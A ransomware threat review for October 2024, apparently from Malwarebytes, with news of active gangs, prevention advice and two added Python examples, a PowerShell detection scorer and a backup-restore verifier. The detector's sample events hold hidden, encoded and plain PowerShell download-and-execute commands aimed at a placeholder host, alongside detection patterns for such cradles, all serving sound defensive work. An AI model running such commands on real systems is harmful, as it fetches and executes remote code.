
Ransomware review: November 2024
In October 2024 we recorded a total of 575 ransomware victims, a new high for this year.
This article is based on research by Marcelo Rivero, Malwarebytes’ ransomware specialist, who monitors information published by ransomware gangs on their Dark Web sites. In this report, “known attacks” are those where the victim did not pay a ransom. This provides the best overall picture of ransomware activity, but the true number of attacks is far higher.

LockBit was again in the news when police unmasked Aleksandr Ryzhenkov as an Evil Corp member and LockBit affiliate. In an unexpected turn of events, Russia sentenced Aleksandr and three other members of the ransomware gang REvil to multiple years in prison for charges related to hacking and money laundering.
The relatively recently emerged Trinity ransomware gang has already made enough waves to attract a dedicated federal warning aimed at the healthcare industry.
Black Basta ransomware operators have been spotted using Microsoft Teams chat messages to engage with prospective targets, and using malicious QR codes that redirect those targets to a fraudulent domain to facilitate initial access. Our own analysts detailed how the group used a PowerShell command to hide Cobalt Strike beacons in memory.
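The PowerShell launch described above is the kind of event a defender can score from process-creation telemetry. The following is an added example, not code from the article or from Malwarebytes: it takes a handful of constructed Sysmon-style process events (not real telemetry), decodes any `-EncodedCommand` payload (base64 of UTF-16LE text), and scores the raw and decoded command lines against a small set of indicators. The indicator list, its weights, the alert threshold and the list of "unusual" parent processes are this example's own assumptions, to be tuned to your environment.

```python
import base64
import re

# Indicator patterns applied to a PowerShell command line and, when present, to the
# decoded -EncodedCommand payload. Patterns and weights are assumptions for illustration,
# not a published signature for any particular group.
INDICATORS = {
    "hidden_window": (re.compile(r"-w(?:in|indowstyle)?\s+hidden", re.I), 1),
    "no_profile": (re.compile(r"-nop(?:rofile)?\b", re.I), 1),
    "execution_policy_bypass": (re.compile(r"-e(?:x|xecutionpolicy|p)\s+bypass", re.I), 1),
    "encoded_command": (re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I), 2),
    "download_cradle": (re.compile(r"(?:\biex\b|invoke-expression).*?(?:downloadstring|downloadfile|invoke-webrequest|\biwr\b)", re.I), 3),
    "reflective_load": (re.compile(r"\[(?:System\.)?Reflection\.Assembly\]::Load|VirtualAlloc", re.I), 3),
}
ALERT_THRESHOLD = 3

# Parents that rarely have a legitimate reason to spawn PowerShell on a user workstation
# (assumed list; chat clients and Office apps are common lures for initial access).
UNUSUAL_PARENTS = {"teams.exe", "outlook.exe", "winword.exe", "excel.exe", "msedge.exe", "chrome.exe"}


def decode_encoded_command(b64: str):
    """-EncodedCommand carries base64 of UTF-16LE text; return the text or None if undecodable."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16le", errors="replace")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event: dict) -> dict:
    """Score one process-creation event; returns indicators, score, alert flag and decoded payload."""
    cmdline = event.get("CommandLine", "")
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    hits = {}
    decoded = None

    for name, (pattern, weight) in INDICATORS.items():
        m = pattern.search(cmdline)
        if m:
            hits[name] = weight
            if name == "encoded_command":
                decoded = decode_encoded_command(m.group(1))

    # The raw command line of an encoded launch reveals nothing about the cradle it
    # carries, so the decoded payload is scored with the same patterns.
    if decoded:
        for name, (pattern, weight) in INDICATORS.items():
            if name != "encoded_command" and name not in hits and pattern.search(decoded):
                hits[name] = weight

    if parent in UNUSUAL_PARENTS:
        hits["unusual_parent"] = 2

    score = sum(hits.values())
    return {"indicators": sorted(hits), "score": score,
            "alert": score >= ALERT_THRESHOLD, "decoded_command": decoded}


def analyze_events(events) -> list:
    return [analyze_event(e) for e in events]


# Constructed sample events in a simplified Sysmon Event ID 1 layout (not real telemetry).
_ENCODED_CRADLE = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')".encode("utf-16le")
).decode("ascii")

SAMPLE_EVENTS = [
    {   # hidden, encoded launch from a chat client
        "ParentImage": r"C:\Users\alice\AppData\Local\Microsoft\Teams\current\Teams.exe",
        "CommandLine": f"powershell.exe -nop -w hidden -ep bypass -enc {_ENCODED_CRADLE}",
    },
    {   # benign administrative script
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r"powershell.exe -File C:\scripts\inventory.ps1",
    },
    {   # plaintext download cradle with a hidden window
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "powershell -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')\"",
    },
]

if __name__ == "__main__":
    for event, result in zip(SAMPLE_EVENTS, analyze_events(SAMPLE_EVENTS)):
        print(("ALERT " if result["alert"] else "ok    ") + f"score={result['score']:>2} {result['indicators']}")
```

The first sample event is the instructive one: on the raw command line it only shows launch flags, and the download cradle appears only after the encoded payload is decoded, which is why a rule that stops at the visible text under-scores it.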
Elsewhere, researchers noticed a series of attacks exploiting a known vulnerability in Veeam, some of which dropped Fog ransomware. Ransomware attacks involving Akira and Fog families have also taken advantage of systems running SonicWall SSL VPNs that are unpatched against CVE-2024-40766.
The US remains the most targeted country, and in October 2024 the number of known attacks exceeded the rest of the world combined.

Services remains the most attacked sector, but the rise in attacks on manufacturing continues, pushing it into second place globally.

In other ransomware-related news, Australia has introduced its first standalone cybersecurity law, which requires certain businesses to report ransom payments.
New ransomware gangs
BASHE

BASHE is widely seen as a LockBit spin-off but likes to regard itself as an Advanced Persistent Threat (APT). The group’s activities have reportedly impacted organizations across North America, the United Kingdom, France, Germany, India, and Australia.
Nitrogen

The Nitrogen initial access malware campaign uses Google and Bing search ads to promote fake software sites that infect unsuspecting users with Cobalt Strike and ransomware payloads. To target IT professionals, the campaign impersonates popular software like AnyDesk, Cisco AnyConnect VPN, TreeSize Free, and WinSCP.
Sarcoma Group

New as the Sarcoma group may be, they have already made it into the top five for October with 41 known attacks.
How to avoid ransomware
- Block common forms of entry. Create a plan for patching vulnerabilities in internet-facing systems quickly, and disable or harden remote access like RDP and VPNs.
- Prevent intrusions. Stop threats early before they can even infiltrate or infect your endpoints. Use endpoint security software that can prevent exploits and malware used to deliver ransomware.
- Detect intrusions. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
- Stop malicious encryption. Deploy Endpoint Detection and Response software like ThreatDown EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
- Create offsite, offline backups. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
- Don’t get attacked twice. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.
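A backup is only as good as the restore you have actually tested. As an added example (not code from the article or from any backup product), the script below records a SHA-256 manifest of a source tree at backup time and later compares a restored tree against it, reporting files that are missing, changed or unexpected. The `demo()` function builds a constructed scenario in a temporary directory: three files are backed up, then one is restored with altered contents and one is not restored at all, which is exactly what a periodic restore test should catch.

```python
import hashlib
import tempfile
from pathlib import Path


def sha256_file(path: Path) -> str:
    """Stream a file through SHA-256 so large backups do not need to fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root) -> dict:
    """Map each file's path (relative to root, POSIX separators) to its SHA-256.
    Store the result alongside the offline backup so a restore can be verified later."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): sha256_file(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def verify_restore(manifest: dict, restored_root) -> dict:
    """Compare a restored tree against the manifest taken at backup time."""
    restored = build_manifest(restored_root)
    missing = sorted(set(manifest) - set(restored))          # never restored
    extra = sorted(set(restored) - set(manifest))            # not part of the backup
    mismatched = sorted(p for p in manifest.keys() & restored.keys()
                        if manifest[p] != restored[p])       # content differs
    return {"ok": not (missing or extra or mismatched),
            "missing": missing, "extra": extra, "mismatched": mismatched}


def demo() -> dict:
    """Constructed scenario: back up three files, then restore one altered and one missing."""
    with tempfile.TemporaryDirectory() as tmp:
        src = Path(tmp, "src")
        (src / "conf").mkdir(parents=True)
        (src / "db.sql").write_bytes(b"CREATE TABLE orders(id INT);")
        (src / "conf" / "app.ini").write_text("mode=prod\n")
        (src / "notes.txt").write_text("restore order: db first\n")
        manifest = build_manifest(src)  # taken at backup time

        restored = Path(tmp, "restored")
        (restored / "conf").mkdir(parents=True)
        (restored / "db.sql").write_bytes(b"CREATE TABLE orders(id INT);")  # intact
        (restored / "conf" / "app.ini").write_text("mode=dev\n")            # silently changed
        # notes.txt is deliberately not restored
        return verify_restore(manifest, restored)


if __name__ == "__main__":
    print(demo())
```

Run the same `verify_restore` against a real restore into a scratch location, and keep the manifest with the offline copy rather than on the production system, so that an intruder who tampers with live data cannot also rewrite the record you compare against.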